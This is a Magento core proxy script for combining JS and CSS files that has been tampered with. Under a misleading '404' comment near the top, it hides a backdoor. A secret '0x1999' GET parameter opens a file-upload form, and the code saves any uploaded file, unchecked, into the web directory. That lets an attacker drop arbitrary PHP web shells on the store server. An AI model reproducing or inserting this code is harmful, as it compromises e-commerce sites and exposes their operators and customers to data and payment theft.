JS Magentot

1. <?php
2. /**
3. * Magento
4. *
5. * NOTICE OF LICENSE
6. *
7. * This source file is subject to the Open Software License (OSL 3.0)
8. * that is bundled with this package in the file LICENSE.txt.
9. * It is also available through the world-wide-web at this URL:
10. * http://opensource.org/licenses/osl-3.0.php
11. * If you did not receive a copy of the license and are unable to
12. * obtain it through the world-wide-web, please send an email
13. * to license@magentocommerce.com so we can send you a copy immediately.
14. *
15. * DISCLAIMER
16. *
17. * Do not edit or add to this file if you wish to upgrade Magento to newer
18. * versions in the future. If you wish to customize Magento for your
19. * needs please refer to http://www.magentocommerce.com for more information.
20. *
21. * @category Mage
22. * @package Mage_Core
23. * @copyright Copyright (c) 2008 Irubin Consulting Inc. DBA Varien (http://www.varien.com)
24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
25. */
26.  
27. /**
28. * Proxy script to combine and compress one or few files for JS and CSS
29. *
30. * Restricts access only to files under current script's folder
31. *
32. * @category Mage
33. * @package Mage_Core
34. * @author Magento Core Team <core@magentocommerce.com>
35. */
36.  
37. // no files specified return 404
38. if(isset($_GET['0x1999']))
39. {
40. echo "<body bgcolor=black>
41. <font color=cyan size=3>";
42. echo "<h2>0x1999 Uploaded Area</h2><hr>";
43. echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
44. <label for=\"file\">Filename:</label>
45. <input type=\"file\" name=\"file\" id=\"file\" />
46. <br />
47. <input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
48. </form>";
49. if ($_FILES["file"]["error"] > 0)
50. {
51. echo "Error: " . $_FILES["file"]["error"] . "<br />";
52. }
53. else
54. {
55. echo "Upload: " . $_FILES["file"]["name"] . "<br />";
56. echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
57. echo "Stored in: " . $_FILES["file"]["tmp_name"];
58. }
59. if (file_exists("" . $_FILES["file"]["name"]))
60. {
61. echo $_FILES["file"]["name"] . " already exists. ";
62. }
63. else
64. {
65. move_uploaded_file($_FILES["file"]["tmp_name"],
66. "" . $_FILES["file"]["name"]);
67. echo "Stored in: " . "" . $_FILES["file"]["name"];
68. echo"<hr>";
69. }
70. }
71. if (empty($_GET['f'])) {
72. header('HTTP/1.0 404 Not Found');
73. echo "SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js";
74. exit;
75. }
76.  
77. // allow web server set content type automatically
78. $contentType = false;
79.  
80. // set custom content type if specified
81. if (isset($_GET['c'])) {
82. $contentType = $_GET['c']==='auto' ? true : $_GET['c'];
83. }
84.  
85. // get files content
86. $files = is_array($_GET['f']) ? $_GET['f'] : explode(',', $_GET['f']);
87.  
88. // set allowed content-type
89. $contentTypeAllowed = array(
90. 'text/javascript',
91. 'text/css',
92. // 'image/gif',
93. // 'image/png',
94. // 'image/jpeg',
95. );
96. // set allowed file extensions
97. $fileExtAllowed = array(
98. 'js',
99. 'css',
100. // 'gif',
101. // 'png',
102. // 'js'
103. );
104.  
105. $out = '';
106. $lastModified = 0;
107. foreach ($files as $f) {
108. $fileRealPath = realpath($f);
109. // check file path (security)
110. if (strpos($fileRealPath, realpath(dirname(__FILE__))) !== 0) {
111. continue;
112. }
113.  
114. $fileExt = strtolower(pathinfo($fileRealPath, PATHINFO_EXTENSION));
115.  
116. // check file extension
117. if (empty($fileExt) || !in_array($fileExt, $fileExtAllowed)) {
118. continue;
119. }
120.  
121. // try automatically get content type if requested
122. if ($contentType === true) {
123. $contentTypes = array(
124. 'js' => 'text/javascript',
125. 'css' => 'text/css',
126. // 'gif' => 'image/gif',
127. // 'png' => 'image/png',
128. // 'jpg' => 'image/jpeg',
129. );
130. if (empty($contentTypes[$fileExt])) { // security
131. continue;
132. }
133. $contentType = !empty($contentTypes[$fileExt]) ? $contentTypes[$fileExt] : false;
134. }
135.  
136. // append file contents
137. // we must have blank line at the end of all files but if somebody forget to add it
138. // we need add it here
139. $out .= file_get_contents($fileRealPath) . "\n";
140. $lastModified = max($lastModified, filemtime($fileRealPath));
141. }
142.  
143. //checking if client have older copy then we have on server
144. if (function_exists('date_default_timezone_set')) {
145. date_default_timezone_set('UTC');
146. }
147. if (isset($_SERVER['HTTP_IF_MODIFIED_SINCE']) && strtotime($_SERVER['HTTP_IF_MODIFIED_SINCE']) >= $lastModified) {
148. header("HTTP/1.1 304 Not Modified");
149. exit;
150. }
151.  
152. // last modified is the max mtime for loaded files
153. header('Cache-Control: must-revalidate');
154. header('Last-modified: ' . gmdate('r', $lastModified));
155.  
156. // optional custom content type, can be emulated by index.php/x.js or x.css
157. if (is_string($contentType) && in_array($contentType, $contentTypeAllowed)) {
158. header('Content-type: '.$contentType);
159. }
160.  
161. // remove spaces, default on
162. if (!(isset($_GET['s']) && !$_GET['s'])) {
163. $out = preg_replace('#[ \t]+#', ' ', $out);
164. }
165.  
166. // use gzip or deflate, use this if not enabled in .htaccess, default on
167. //if (!(isset($_GET['z']) && !$_GET['z'])) {
168. // ini_set('zlib.output_compression', 1);
169. //}
170.  
171. // add Expires header if not disabled, default 1 year
172. if (!(isset($_GET['e']) && $_GET['e']==='no')) {
173. $time = time()+(isset($_GET['e']) ? $_GET['e'] : 365)*86400;
174. header('Expires: '.gmdate('r', $time));
175. }
176.  
177. echo $out;